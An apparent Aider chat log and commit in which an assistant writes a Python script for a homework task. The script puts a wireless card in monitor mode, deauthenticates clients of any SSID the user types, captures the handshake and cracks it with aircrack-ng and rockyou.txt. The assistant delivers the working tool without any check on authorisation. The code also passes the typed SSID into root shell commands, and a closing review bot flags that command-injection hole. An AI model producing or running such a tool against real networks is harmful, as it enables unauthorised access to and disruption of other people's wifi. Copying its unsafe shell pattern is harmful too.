aider: Implemented a Python application to assist in WiFi penetration testing by prompting the user for a target network SSID, capturing the handshake, and cracking the password using a wordlist.
# Aider chat conversation:
USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password.
This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng.
Operations may be run sequentially, or in parallel using multi-threading
As needed, the use of shell tools should utilize sudo capabilities
As needed, the application may utilize a wordlist found at ~/rockyou.txt
As needed, the application can change the state of the users wifi interface between managed and monitor mode
Save this to hw7/claude/app.py
ASSISTANT: Here is the Python application to assist in WiFi penetration testing, saved to hw7/claude/app.py:
hw7/claude/app.py
```python
<<<<<<< SEARCH
=======
import subprocess
import re
def run_command(command):
output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
return output.decode('utf-8')
def change_to_monitor_mode(interface):
run_command(f"sudo airmon-ng start {interface}")
def change_to_managed_mode(interface):
run_command(f"sudo airmon-ng stop {interface}")
def get_wifi_interfaces():
output = run_command("iwconfig")
interfaces = re.findall(r"(\w+)\s+IEEE", output)
return interfaces
def get_target_network(interface):
while True:
target_ssid = input("Enter the SSID of the target network: ")
output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
if target_ssid in output:
break
print(f"Network {target_ssid} not found. Please try again.")
return target_ssid
def capture_handshake(target_network, interface):
print(f"Capturing handshake for network {target_network}...")
run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
run_command("sudo killall airodump-ng")
def crack_password(capture_file, wordlist):
print("Cracking password...")
output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
return password
def main():
interfaces = get_wifi_interfaces()
if len(interfaces) == 0:
print("No WiFi interfaces found.")
return
interface = interfaces[0]
print(f"Using interface {interface}")
change_to_monitor_mode(interface)
target_network = get_target_network(interface)
capture_handshake(target_network, interface)
change_to_managed_mode(interface)
capture_file = "capture-01.cap"
wordlist = "~/rockyou.txt"
password = crack_password(capture_file, wordlist)
print(f"Password for network {target_network} is: {password}")
if __name__ == "__main__":
main()
>>>>>>> REPLACE
```
This application does the following:
1. Gets the available WiFi interfaces using `iwconfig`
2. Prompts the user to enter the SSID of the target network
3. Changes the WiFi interface to monitor mode using `airmon-ng`
4. Captures the handshake for the target network using `airodump-ng` and `aireplay-ng`
5. Changes the WiFi interface back to managed mode
6. Cracks the password using the captured handshake file and a wordlist (`~/rockyou.txt`) with `aircrack-ng`
7. Prints out the cracked password for the target network
It uses `subprocess` to run the shell commands and `re` to parse the output. The WiFi interface is changed between managed and monitor modes as needed.
parent
39f260f5b8
commit
c2e9d1eec5
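--- a/hw7/claude/app.py
+++ b/hw7/claude/app.py
@@ -0,0 +1,63 @@
+import subprocess
+import re
+
+def run_command(command):
+output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT)
+return output.decode('utf-8')
+
+def change_to_monitor_mode(interface):
+run_command(f"sudo airmon-ng start {interface}")
+
+def change_to_managed_mode(interface):
+run_command(f"sudo airmon-ng stop {interface}")
+
+def get_wifi_interfaces():
+output = run_command("iwconfig")
+interfaces = re.findall(r"(\w+)\s+IEEE", output)
+return interfaces
+
+def get_target_network(interface):
+while True:
+target_ssid = input("Enter the SSID of the target network: ")
+output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}")
+if target_ssid in output:
+break
+print(f"Network {target_ssid} not found. Please try again.")
+return target_ssid
+
+def capture_handshake(target_network, interface):
+print(f"Capturing handshake for network {target_network}...")
+run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &")
+run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}")
+run_command("sudo killall airodump-ng")
+
+def crack_password(capture_file, wordlist):
+print("Cracking password...")
+output = run_command(f"aircrack-ng {capture_file} -w {wordlist}")
+password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1)
+return password
+
+def main():
+interfaces = get_wifi_interfaces()
+if len(interfaces) == 0:
+print("No WiFi interfaces found.")
+return
+
+interface = interfaces[0]
+print(f"Using interface {interface}")
+
+change_to_monitor_mode(interface)
+
+target_network = get_target_network(interface)
+capture_handshake(target_network, interface)
+
+change_to_managed_mode(interface)
+
+capture_file = "capture-01.cap"
+wordlist = "~/rockyou.txt"
+password = crack_password(capture_file, wordlist)
+
+print(f"Password for network {target_network} is: {password}")
+
+if __name__ == "__main__":
+main()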
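Review bot: `run_command` hands every string to `subprocess.check_output(..., shell=True)`, and `get_target_network` and `capture_handshake` interpolate the SSID read from `input()` into those strings under `sudo`, so shell metacharacters in the SSID are interpreted by a root shell; the single quotes around `{target_ssid}` do not prevent this. Build each command as an argument list and drop the shell, e.g. `subprocess.check_output(["sudo", "airmon-ng", "start", interface], stderr=subprocess.STDOUT)`. In `main`, nothing restores managed mode if a step after `change_to_monitor_mode(interface)` raises, so that section belongs in a `try`/`finally` that calls `change_to_managed_mode(interface)`. `crack_password` calls `.group(1)` directly on the `re.search` result, which raises `AttributeError` when the output has no `KEY FOUND!` line; check for `None` and report the failure instead.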